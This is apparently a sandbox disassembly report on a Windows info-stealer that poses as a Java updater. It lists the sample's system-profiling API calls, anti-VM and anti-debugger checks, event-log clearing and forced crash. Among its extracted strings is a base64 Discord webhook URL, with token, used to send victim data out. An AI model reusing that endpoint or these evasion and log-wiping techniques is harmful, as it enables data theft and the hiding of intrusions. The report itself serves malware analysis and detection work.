7ff670fcc3a0 5326->5643 5334 7ff670fcaabf 5327->5334 5328->5346 5329 7ff670fca9b5 5677 7ff670fcaee0 5329->5677 5338 7ff670fcaee0 2 API calls 5331->5338 5339 7ff670fcda34 _Receive_impl free 5334->5339 5342 7ff670fcaa76 5337->5342 5347 7ff670fcaa94 _invalid_parameter_noinfo_noreturn 5337->5347 5350 7ff670fcaa30 5337->5350 5338->5350 5339->5350 5340->5316 5340->5324 5340->5325 5341 
7ff670fcccf0 19 API calls 5341->5346 5348 7ff670fcda34 _Receive_impl free 5342->5348 5343 7ff670fcda34 _Receive_impl free 5343->5316 5344->5316 5345 7ff670fcaa28 5344->5345 5344->5347 5344->5350 5349 7ff670fcda34 _Receive_impl free 5345->5349 5346->5341 5346->5354 5347->5331 5348->5350 5349->5350 5350->5343 5351 7ff670fcccf0 19 API calls 5351->5354 5353 7ff670fc7080 19 API calls 5353->5354 5354->5329 5354->5351 5354->5353 5669 7ff670fcc470 5354->5669 5356 7ff670fca640 20 API calls 5355->5356 5357 7ff670fc64bd 5356->5357 5358 7ff670fcd9f0 4 API calls 5357->5358 5359 7ff670fc64d5 5358->5359 5360 7ff670fc34a0 8 API calls 5359->5360 5361 7ff670fc6510 5360->5361 5362 7ff670fca640 20 API calls 5361->5362 5363 7ff670fc6538 5362->5363 5364 7ff670fc8e00 55 API calls 5363->5364 5365 7ff670fc657f 5364->5365 5366 7ff670fca640 20 API calls 5365->5366 5367 7ff670fc65ab 5366->5367 5368 7ff670fcd9f0 4 API calls 5367->5368 5369 7ff670fc65c3 5368->5369 5370 7ff670fc34a0 8 API calls 5369->5370 5371 7ff670fc65fe 5370->5371 5372 7ff670fca640 20 API calls 5371->5372 5373 7ff670fc662c 5372->5373 5696 7ff670fcbc80 5373->5696 5376 7ff670fc8e00 55 API calls 5377 7ff670fc6678 5376->5377 5378 7ff670fca640 20 API calls 5377->5378 5379 7ff670fc66a4 5378->5379 5380 7ff670fcd9f0 4 API calls 5379->5380 5381 7ff670fc66bc 5380->5381 5382 7ff670fc34a0 8 API calls 5381->5382 5383 7ff670fc66f7 5382->5383 5703 7ff670fc8dd0 5383->5703 5385 7ff670fc671e 5706 7ff670fc8550 5385->5706 5389 7ff670fc677b 5390 7ff670fcaf70 20 API calls 5389->5390 5391 7ff670fc678f 5390->5391 5392 7ff670fcb050 28 API calls 5391->5392 5393 7ff670fc67a0 5392->5393 5394 7ff670fc8550 55 API calls 5393->5394 5395 7ff670fc67df 5394->5395 5396 7ff670fc8550 55 API calls 5395->5396 5397 7ff670fc681e 5396->5397 5398 7ff670fc8550 55 API calls 5397->5398 5399 7ff670fc685d 5398->5399 5400 7ff670fc8e00 55 API calls 5399->5400 5401 7ff670fc689b 5400->5401 5402 7ff670fca640 20 API calls 5401->5402 5434 7ff670fc694e 5402->5434 5403 7ff670fc6e07 
5404 7ff670fca640 20 API calls 5403->5404 5431 7ff670fc6ffd 5403->5431 5406 7ff670fc6e47 5404->5406 5405 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 5407 7ff670fc7049 5405->5407 5408 7ff670fcd9f0 __std_exception_copy malloc free _CxxThrowException 5406->5408 5436 7ff670fc8e00 5407->5436 5410 7ff670fc6e60 5408->5410 5409 7ff670fcc6e0 50 API calls 5409->5434 5411 7ff670fc34a0 8 API calls 5410->5411 5413 7ff670fc6e9b 5411->5413 5412 7ff670fca640 20 API calls 5412->5434 5414 7ff670fca640 20 API calls 5413->5414 5415 7ff670fc6ed0 5414->5415 5416 7ff670fcd9f0 __std_exception_copy malloc free _CxxThrowException 5415->5416 5417 7ff670fc6ee9 5416->5417 5418 7ff670fc2a40 13 API calls 5417->5418 5419 7ff670fc6f0d 5418->5419 5420 7ff670fc8e00 55 API calls 5419->5420 5421 7ff670fc6f53 5420->5421 5423 7ff670fc8e00 55 API calls 5421->5423 5422 7ff670fc2a40 13 API calls 5422->5434 5424 7ff670fc6f92 5423->5424 5425 7ff670fc34a0 8 API calls 5424->5425 5426 7ff670fc6fc6 5425->5426 5427 7ff670fcc6e0 50 API calls 5426->5427 5428 7ff670fc6fd5 5427->5428 5429 7ff670fca640 20 API calls 5428->5429 5429->5431 5430 7ff670fcd9f0 __std_exception_copy malloc free _CxxThrowException 5430->5434 5431->5405 5432 7ff670fc34a0 8 API calls 5432->5434 5433 7ff670fc8e00 55 API calls 5433->5434 5434->5403 5434->5409 5434->5412 5434->5422 5434->5430 5434->5432 5434->5433 5435 7ff670fc8720 71 API calls 5434->5435 5435->5434 5442 7ff670fc8e5b 5436->5442 5437 7ff670fc9056 5438 7ff670fcd9f0 4 API calls 5437->5438 5440 7ff670fc906c 5438->5440 5439 7ff670fc8eff 5711 7ff670fcbc00 5439->5711 5443 7ff670fc9051 5440->5443 5730 7ff670fcd610 5440->5730 5442->5437 5442->5439 5448 7ff670fc9138 5442->5448 5445 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 5443->5445 5447 7ff670fc9118 5445->5447 5446 7ff670fc90b1 5446->5443 5450 7ff670fcab10 8 API calls 5446->5450 5447->4930 5452 7ff670fcb3b0 16 API calls 5448->5452 5450->5446 5453 7ff670fc9150 5452->5453 5746 7ff670fcbff0 5453->5746 5455 
7ff670fc9133 5744 7ff670fc5680 ?_Xlength_error@std@@YAXPEBD 5455->5744 5458 7ff670fcd9f0 4 API calls 5460 7ff670fc8f09 5458->5460 5460->5443 5460->5455 5460->5458 5464 7ff670fca640 20 API calls 5460->5464 5718 7ff670fcab10 5460->5718 5722 7ff670fcd320 5460->5722 5726 7ff670fcd540 5460->5726 5461 7ff670fc91b1 5463 7ff670fc91d6 5461->5463 5466 7ff670fc91f1 _invalid_parameter_noinfo_noreturn 5461->5466 5462 7ff670fc91de 5462->4930 5465 7ff670fcda34 _Receive_impl free 5463->5465 5464->5460 5465->5462 5467 7ff670fc7080 20 API calls 5466->5467 5468 7ff670fc9212 5467->5468 5469 7ff670fc9248 5468->5469 5470 7ff670fc9240 5468->5470 5471 7ff670fc9261 _invalid_parameter_noinfo_noreturn 5468->5471 5469->4930 5472 7ff670fcda34 _Receive_impl free 5470->5472 5774 7ff670fc92a0 __std_exception_copy __std_exception_copy 5471->5774 5472->5469 5474 7ff670fc927e 5474->4930 5476 7ff670fcb14e ?good@ios_base@std@ 5475->5476 5477 7ff670fcb147 5475->5477 5478 7ff670fcb190 5476->5478 5479 7ff670fcb162 5476->5479 5477->5476 5480 7ff670fcb19e ?getloc@ios_base@std@@QEBA?AVlocale@2 ??0_Lockit@std@@QEAA@H ??Bid@locale@std@ 5478->5480 5481 7ff670fcb346 ?uncaught_exceptions@std@ 5478->5481 5479->5478 5485 7ff670fcb178 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 5479->5485 5482 7ff670fcb1f8 5480->5482 5483 7ff670fcb350 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 5481->5483 5484 7ff670fcb35a 5481->5484 5486 7ff670fcb280 ??1_Lockit@std@@QEAA 5482->5486 5487 7ff670fcb21b 5482->5487 5488 7ff670fcb20f ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12 5482->5488 5483->5484 5490 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 5484->5490 5485->5478 5489 7ff670fcb2b6 ?put@?$time_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@QEBA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@AEAVios_base@2@DPEBUtm@@PEBD3 5486->5489 5500 7ff670fcb299 5486->5500 5487->5486 5494 7ff670fcb235 

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00007FF670FC34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF670FC14B3), ref: 00007FF670FC34D8
                                          • Part of subcall function 00007FF670FC6000: CryptStringToBinaryA.CRYPT32 ref: 00007FF670FC6065
                                          • Part of subcall function 00007FF670FC6000: memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,System,?), ref: 00007FF670FC60A6
                                          • Part of subcall function 00007FF670FC6000: CryptStringToBinaryA.CRYPT32 ref: 00007FF670FC60DF
                                          • Part of subcall function 00007FF670FC6000: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,System,?), ref: 00007FF670FC6141
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FC7150
                                        • _Xtime_get_ticks.MSVCP140 ref: 00007FF670FC7397
                                        • memset.VCRUNTIME140 ref: 00007FF670FC73D6
                                        • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF670FC7401
                                        • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF670FC7423
                                        • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF670FC7466
                                        • _gmtime64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF670FC7493
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FC7932
                                        • memmove.VCRUNTIME140 ref: 00007FF670FC798D
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FC7A7F
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FC7ACA
                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF670FC7B50
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FC7B91
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FC7BF3
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FC7C4A
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FC7CAC
                                        • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF670FC7D0B
                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF670FC7D19
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FC7D70
                                          • Part of subcall function 00007FF670FCB470: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FCB53E
                                          • Part of subcall function 00007FF670FCB470: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FCB58D
                                          • Part of subcall function 00007FF670FCB470: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FCB5CC
                                        • _CxxThrowException.VCRUNTIME140 ref: 00007FF670FC7DF5
                                          • Part of subcall function 00007FF670FC11C0: ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140 ref: 00007FF670FC11CB
                                          • Part of subcall function 00007FF670FC34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF670FC14B3), ref: 00007FF670FC3579
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF670FC7E00
                                        • GetUserNameW.ADVAPI32 ref: 00007FF670FC7E9D
                                        • GetComputerNameW.KERNEL32 ref: 00007FF670FC7F2E
                                        • GetVolumeInformationW.KERNELBASE ref: 00007FF670FC801F
                                        • memset.VCRUNTIME140 ref: 00007FF670FC80EC
                                        • GetVersionExW.KERNEL32 ref: 00007FF670FC8102
                                          • Part of subcall function 00007FF670FC3280: __stdio_common_vswprintf_s.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF670FC32C3
                                          • Part of subcall function 00007FF670FC21A0: ?_Init@locale@std@@CAPEAV_Locimp@12@_N@Z.MSVCP140 ref: 00007FF670FC21C0
                                          • Part of subcall function 00007FF670FC21A0: ??0?$codecvt@_WDU_Mbstatet@@@std@@QEAA@_K@Z.MSVCP140 ref: 00007FF670FC2216
                                          • Part of subcall function 00007FF670FC21A0: ?_New_Locimp@_Locimp@locale@std@@CAPEAV123@AEBV123@@Z.MSVCP140 ref: 00007FF670FC2232
                                          • Part of subcall function 00007FF670FC21A0: ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF670FC2242
                                          • Part of subcall function 00007FF670FC21A0: ?_Addfac@_Locimp@locale@std@@AEAAXPEAVfacet@23@_K@Z.MSVCP140 ref: 00007FF670FC2251
                                          • Part of subcall function 00007FF670FC21A0: ??4?$_Yarn@D@std@@QEAAAEAV01@PEBD@Z.MSVCP140 ref: 00007FF670FC2265
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$U?$char_traits@$D@std@@@std@@$V01@memmovememset$BinaryCryptLocimp@locale@std@@NameString$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??0?$codecvt@_??1?$basic_ios@??1?$basic_iostream@??4?$_??6?$basic_ostream@Addfac@_Bid@locale@std@@ComputerConcurrency::cancel_current_taskD@std@@D@std@@@1@@ExceptionInformationInit@locale@std@@Locimp@12@_Locimp@_Mbstatet@@@std@@New_ThrowUserV01@@V123@V123@@V?$basic_streambuf@VersionVfacet@23@_VolumeXlength_error@std@@Xtime_get_ticksYarn@__stdio_common_vswprintf_s_gmtime64
                                        • String ID: -d "$%08X$%Y-%m-%dT%H:%M:%S.000Z$Application$C:\$Drives$New client$Security$System$Webhook sent. Response: $aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvMTMyMTMyODYwMjc5MjQ2MDMzMC9ROUNRTVVxaFBtbkxBOFlDR0ZpV2NOMXFzbWQ4U3pFekhWNVJjRnJJdVl4OFVXVTJiU0czZmR3NGdyMUM3QVZoSlFobQ==$embeds$h$ip address$local user$product version$serial number$system name$timestamp
                                        • API String ID: 2975285854-287537819
                                        • Opcode ID: 9b066d39bca7f0125630d68e17dcf06c2f61835fd65c2a9164d8d62af6434d99
                                        • Instruction ID: 91eea6f960a56bfab42a7a70fcfa81334f6ac954d92b69000590c9f42914a5ec
                                        • Opcode Fuzzy Hash: 9b066d39bca7f0125630d68e17dcf06c2f61835fd65c2a9164d8d62af6434d99
                                        • Instruction Fuzzy Hash: D4B27A33A2CBC6A5EB60CB24E4413EE6361FB95794F505222DA9D83B99DF7CD184C710

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        Control-flow graph of the function at 7ff670fc4990 (node listing not reproduced). API calls named in the graph: CoInitializeEx, CoCreateInstance, VariantInit, VariantClear, SysAllocString, SysFreeString, CoUninitialize
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInitString$AllocFree$CreateInitializeInstanceUninitializemalloc
                                        • String ID: Application$Java Platform SE$JavaUpdater$Security$System
                                        • API String ID: 2476186896-3516896312
                                        • Opcode ID: 24fa38df1a393179961b0acccd3c08c8b86d02bbf71ef8b19e25cd5064ac1328
                                        • Instruction ID: c883ec75b90a400e7965a5aa98a1040130b107c0a50d705816ccd867bb7a85e5
                                        • Opcode Fuzzy Hash: 24fa38df1a393179961b0acccd3c08c8b86d02bbf71ef8b19e25cd5064ac1328
                                        • Instruction Fuzzy Hash: 2F423633A19B859AEB11DF34D8502AE33A0FB89B48F148226DE4D97B68DF7CD585C310

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        Control-flow graph of the function at 7ff670fc7e10 (node listing not reproduced). API calls named in the graph: GetUserNameW, GetComputerNameW, GetVolumeInformationW, memset, GetVersionExW, GetModuleHandleW, GetProcAddress, _invalid_parameter_noinfo_noreturn
                                        APIs
                                          • Part of subcall function 00007FF670FC34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF670FC14B3), ref: 00007FF670FC34D8
                                        • GetUserNameW.ADVAPI32 ref: 00007FF670FC7E9D
                                          • Part of subcall function 00007FF670FC21A0: ?_Init@locale@std@@CAPEAV_Locimp@12@_N@Z.MSVCP140 ref: 00007FF670FC21C0
                                          • Part of subcall function 00007FF670FC21A0: ??0?$codecvt@_WDU_Mbstatet@@@std@@QEAA@_K@Z.MSVCP140 ref: 00007FF670FC2216
                                          • Part of subcall function 00007FF670FC21A0: ?_New_Locimp@_Locimp@locale@std@@CAPEAV123@AEBV123@@Z.MSVCP140 ref: 00007FF670FC2232
                                          • Part of subcall function 00007FF670FC21A0: ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF670FC2242
                                          • Part of subcall function 00007FF670FC21A0: ?_Addfac@_Locimp@locale@std@@AEAAXPEAVfacet@23@_K@Z.MSVCP140 ref: 00007FF670FC2251
                                          • Part of subcall function 00007FF670FC21A0: ??4?$_Yarn@D@std@@QEAAAEAV01@PEBD@Z.MSVCP140 ref: 00007FF670FC2265
                                        • GetComputerNameW.KERNEL32 ref: 00007FF670FC7F2E
                                        • GetVolumeInformationW.KERNELBASE ref: 00007FF670FC801F
                                          • Part of subcall function 00007FF670FC34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF670FC14B3), ref: 00007FF670FC3579
                                          • Part of subcall function 00007FF670FC34A0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF670FC3597
                                        • memset.VCRUNTIME140 ref: 00007FF670FC80EC
                                        • GetVersionExW.KERNEL32 ref: 00007FF670FC8102
                                        • GetModuleHandleW.KERNEL32 ref: 00007FF670FC811A
                                        • GetProcAddress.KERNEL32 ref: 00007FF670FC812A
                                          • Part of subcall function 00007FF670FC34A0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF670FC14B3), ref: 00007FF670FC3556
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FC8389
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: Locimp@locale@std@@Name_invalid_parameter_noinfo_noreturnmemmove$??0?$codecvt@_??4?$_Addfac@_AddressBid@locale@std@@ComputerConcurrency::cancel_current_taskD@std@@HandleInformationInit@locale@std@@Locimp@12@_Locimp@_Mbstatet@@@std@@ModuleNew_ProcUserV01@V123@V123@@VersionVfacet@23@_VolumeYarn@memset
                                        • String ID: %08X$Application$C:\$Drives$GetProductInfo$New client$Unknown$Windows %d.%d (Build %d)$ip address$kernel32.dll$local user$product version$serial number$system name
                                        • API String ID: 1900567759-3537065479
                                        • Opcode ID: 5080b76f6441fb5deaf58bdfd11dae4b1887ad35dd40ac654e91d0965d0d4ce7
                                        • Instruction ID: 40cf5260610fc0e876a5408c37288c45410a607e419991a02d7537d79d5acef1
                                        • Opcode Fuzzy Hash: 5080b76f6441fb5deaf58bdfd11dae4b1887ad35dd40ac654e91d0965d0d4ce7
                                        • Instruction Fuzzy Hash: B1F16123A286C2A9E770DF34D8523EA2361FB95348F905236DA4CC7A99DF7CD685C350

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        Control-flow graph of the function at 7ff670fc42b0 (node listing not reproduced). Windows API calls named in the graph: RtlAdjustPrivilege, NtRaiseHardError, GetConsoleWindow, ShowWindow, SetConsoleCtrlHandler, GetSystemMenu, RemoveMenu, GetModuleFileNameW, GetFileAttributesW, SetFileAttributesW, GdiplusStartup, CoUninitialize, OpenEventLogW, ClearEventLogW, CloseEventLog
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$ConsoleEventFileWindow$?good@ios_base@std@@AttributesMenuV01@$??6?$basic_ostream@?flush@?$basic_ostream@?setstate@?$basic_ios@?uncaught_exceptions@std@@AdjustClearCloseCtrlErrorGdiplusHandlerHardModuleNameOpenOsfx@?$basic_ostream@PrivilegeRaiseRemoveShowStartupSystemUninitializeV01@@V12@_invalid_parameter_noinfo_noreturn
                                        • String ID: Application$Security$System
                                        • API String ID: 1039291073-2169399579
                                        • Opcode ID: 2202469d28eb256a13a2b8e783f8f6042cd7bca2b1afced6cc134338b03aeeda
                                        • Instruction ID: 189735eca92d69c56bc9bd5e1c0edb7911a71867e57c8b36ff1d0345d232dacd
                                        • Opcode Fuzzy Hash: 2202469d28eb256a13a2b8e783f8f6042cd7bca2b1afced6cc134338b03aeeda
                                        • Instruction Fuzzy Hash: EF615D22A2CAC2A2EB54DB24F4593AA63A1FF85784F644135DD4DC3BA4DF7CE445C720

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        Control-flow graph of the function at 7ff670fc1780 (node listing not reproduced). Windows API calls named in the graph: GetLogicalDriveStringsA, GetDriveTypeA
                                        APIs
                                          • Part of subcall function 00007FF670FC34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF670FC14B3), ref: 00007FF670FC34D8
                                        • GetLogicalDriveStringsA.KERNEL32 ref: 00007FF670FC17F4
                                        • memset.VCRUNTIME140 ref: 00007FF670FC1819
                                        • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF670FC1838
                                        • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF670FC1852
                                        • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF670FC1883
                                        • GetDriveTypeA.KERNELBASE ref: 00007FF670FC18FE
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FC1A67
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FC1A6E
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FC1B77
                                        • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF670FC1BB2
                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF670FC1BBC
                                          • Part of subcall function 00007FF670FC34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF670FC14B3), ref: 00007FF670FC3579
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: U?$char_traits@$D@std@@@std@@$_invalid_parameter_noinfo_noreturn$Drivememmove$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@D@std@@@1@@LogicalStringsTypeV?$basic_streambuf@memset
                                        • String ID: (CD-ROM)$ (Local)$ (Network)$ (RAM Disk)$ (Removable)$ (Unknown)$No drives detected
                                        • API String ID: 3633658073-1332592045
                                        • Opcode ID: fc386d3375d3b44eabae3c4723390cc2e52fbe90a3799c7f1168b13f9aec711b
                                        • Instruction ID: 4e193bac3b1e8419787b5d52fdf5fa24ccfcd2858cd7a5eaa66ac709f7fc4f96
                                        • Opcode Fuzzy Hash: fc386d3375d3b44eabae3c4723390cc2e52fbe90a3799c7f1168b13f9aec711b
                                        • Instruction Fuzzy Hash: 49D19963A2CBC2A5EB10CB65E4512AE67A1FB86794F504236DE4DC3BA8DF7CD184C710

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_wcsicmpmemset
                                        • String ID: QEMU$Security check failed!$VBox$VMware$cheatengine-x86_64.exe$ida.exe$ida64.exe$x32dbg.exe$x64dbg.exe
                                        • API String ID: 4057197811-609307201
                                        • Opcode ID: c64f5e80e60c7e590fc2e8e59739d82692e68fa2b7077d425abbb35b56314ba8
                                        • Instruction ID: 951ae1808cf73ca7d12345ff13f3b235fa76b36774bc7d76bb3ea89ff17ad842
                                        • Opcode Fuzzy Hash: c64f5e80e60c7e590fc2e8e59739d82692e68fa2b7077d425abbb35b56314ba8
                                        • Instruction Fuzzy Hash: 15412527B2CA86A4EB44DB60E8552B92372FB44798F944236CD1DD37A4DF3CE649C320

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: Library$FreeProcess$AddressCurrentInformationLoadProcQuery
